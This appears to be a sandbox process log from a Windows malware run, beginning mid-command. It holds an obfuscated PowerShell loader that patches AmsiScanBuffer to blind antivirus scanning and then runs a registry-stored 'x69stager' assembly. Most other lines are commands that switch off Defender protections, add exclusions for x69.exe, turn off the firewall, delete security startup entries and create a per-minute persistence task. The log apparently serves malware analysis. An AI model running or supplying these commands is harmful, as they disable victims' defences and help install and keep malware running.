@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mrKkGBnfHCD=$TZAEQWjGXDmSs.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$IPUohhNAJNPeQp=$KybpxFYdMHuPhT.Invoke($Null,@([Object]$mrKkGBnfHCD,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+'L'+'ib'+[Char](114)+''+[Char](97)+'ry'+[Char](65)+'')));$BsHbkCgAwWjGnYEJu=$KybpxFYdMHuPhT.Invoke($Null,@([Object]$mrKkGBnfHCD,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$KNtegdh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IPUohhNAJNPeQp,$TLljcKwpGUOLINyQcAm).Invoke(''+[Char](97)+'ms'+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$XUgGyysuMXtOUCXGP=$KybpxFYdMHuPhT.Invoke($Null,@([Object]$KNtegdh,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+''+[Char](66)+'u'+[Char](102)+'f'+'e'+''+[Char](114)+'')));$bYDKaTbANg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BsHbkCgAwWjGnYEJu,$aZjbOxNcdAXjGuztqCtRKd).Invoke($XUgGyysuMXtOUCXGP,[uint32]8,4,[ref]$bYDKaTbANg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XUgGyysuMXtOUCXGP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BsHbkCgAwWjGnYEJu,$aZjbOxNcdAXjGuztqCtRKd).Invoke($XUgGyysuMXtOUCXGP,[uint32]8,0x20,[ref]$bYDKaTbANg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+'T'+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](54)+'9'+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:tTTOCAxvJSUr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$nQlLGRSUSBCeKk,[Parameter(Position=1)][Type]$ywlBvduSJp)$LwbqvrTVtWC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+''+'m'+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+'d'+'u'+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+'as'+'s'+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+','+'A'+'u'+''+[Char](116)+'o'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$LwbqvrTVtWC.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+'e'+'c'+''+[Char](105)+'a'+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$nQlLGRSUSBCeKk).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+'M'+'a'+[Char](110)+''+'a'+'g'+[Char](101)+''+'d'+'');$LwbqvrTVtWC.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+'u'+'b'+'li'+'c'+''+[Char](44)+'Hid'+'e'+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+'lot,'+'V'+''+'i'+''+'r'+'tu'+'a'+''+'l'+'',$ywlBvduSJp,$nQlLGRSUSBCeKk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+'a'+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');Write-Output $LwbqvrTVtWC.CreateType();}$wGrWkHPpWUHke=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+'m'+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+'i'+'n'+'3'+[Char](50)+''+'.'+'Un'+'s'+'a'+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$xtOMhiYmxIUDdI=$wGrWkHPpWUHke.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+'r'+''+[Char](111)+'cA'+[Char](100)+''+'d'+''+[Char](114)+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PZvdrMKapPOdAvvYEdz=tTTOCAxvJSUr @([String])([IntPtr]);$AyaPcHdgEbThyubIxsHfNV=tTTOCAxvJSUr @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DwcusrERtjr=$wGrWkHPpWUHke.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+'l'+[Char](108)+'')));$aSASWrPVCjGGKu=$xtOMhiYmxIUDdI.Invoke($Null,@([Object]$DwcusrERtjr,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+'L'+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$nYHIVLkazvLFSzIKf=$xtOMhiYmxIUDdI.Invoke($Null,@([Object]$DwcusrERtjr,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+'e'+''+[Char](99)+'t')));$yGQlvzU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aSASWrPVCjGGKu,$PZvdrMKapPOdAvvYEdz).Invoke(''+'a'+'m'+[Char](115)+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+'l'+'');$EjalRQKfExDuBjCis=$xtOMhiYmxIUDdI.Invoke($Null,@([Object]$yGQlvzU,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+'S'+[Char](99)+'anB'+'u'+'f'+'f'+''+'e'+'r')));$SPdlteeqMb=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nYHIVLkazvLFSzIKf,$AyaPcHdgEbThyubIxsHfNV).Invoke($EjalRQKfExDuBjCis,[uint32]8,4,[ref]$SPdlteeqMb);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EjalRQKfExDuBjCis,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nYHIVLkazvLFSzIKf,$AyaPcHdgEbThyubIxsHfNV).Invoke($EjalRQKfExDuBjCis,[uint32]8,0x20,[ref]$SPdlteeqMb);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](120)+''+'6'+''+[Char](57)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\smartscreen.exe
C:\Windows\System32\smartscreen.exe -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1976 -prefsLen 27100 -prefMapHandle 1980 -prefMapSize 270279 -ipcHandle 2068 -initialChannelId {21571c9d-3048-4321-9836-e694bf23e461} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2428 -prefsLen 27136 -prefMapHandle 2432 -prefMapSize 270279 -ipcHandle 2440 -initialChannelId {0edd748a-82c0-4aca-b2b9-fb787fb13589} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3760 -prefsLen 27277 -prefMapHandle 3764 -prefMapSize 270279 -jsInitHandle 3768 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3776 -initialChannelId {d458b5a4-b9bd-41d8-a284-8dc8eb3b2b80} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3924 -prefsLen 27277 -prefMapHandle 3928 -prefMapSize 270279 -ipcHandle 4032 -initialChannelId {505e0550-0c60-4cc2-b67c-36a4c6a346a5} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4520 -prefsLen 34776 -prefMapHandle 4528 -prefMapSize 270279 -jsInitHandle 4532 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2984 -initialChannelId {90df4ef6-3010-4d3f-9f14-f3f54ece2a3e} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5088 -prefsLen 35013 -prefMapHandle 5092 -prefMapSize 270279 -ipcHandle 1504 -initialChannelId {10f2cfd3-048f-4fad-8605-351904c8cf1e} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2792 -prefsLen 32952 -prefMapHandle 2788 -prefMapSize 270279 -jsInitHandle 5588 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4964 -initialChannelId {833f46d8-5d08-4bcf-97aa-0ab767e614eb} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5752 -prefsLen 32952 -prefMapHandle 5756 -prefMapSize 270279 -jsInitHandle 5760 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5768 -initialChannelId {c52553ae-623b-4cf8-abe0-c9caf8df8d81} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5940 -prefsLen 32952 -prefMapHandle 5944 -prefMapSize 270279 -jsInitHandle 5948 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5956 -initialChannelId {814d3c91-a892-4a30-ad0e-fac83d3d0178} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
